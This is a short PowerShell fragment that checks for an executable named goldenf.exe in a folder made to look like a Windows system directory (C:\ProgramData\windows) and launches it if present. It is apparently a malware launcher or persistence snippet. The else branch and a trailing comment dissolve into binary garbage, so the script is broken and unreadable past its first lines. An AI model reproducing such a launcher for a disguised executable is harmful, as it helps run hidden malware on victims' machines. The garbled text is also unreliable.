$path ="C:\ProgramData\windows\goldenf.exe";
$exists = Test-Path -Path $path -PathType Leaf;
if ( $exists ){
    Start-Process $path
}else/?})p?`v??RX)??f??X`*?f?mSV@o??p?b?t?OJ3?Y?fT?^??#??,;??t?P*M?RP??9???:?-CY:C?g|?s]`>,???-?????}w??n?}?????k_??????b?~;=?? `F?~???f5?4J?6M????\Um?lZ????????!????P??p???


#/})p`vRX)fX`*fmSV@opbtOJ3YfT^#,;tP*MRP9:-CY:Cg|s]`>,-}wn}_b~;= `F~f54J6M\UmlZ!Pp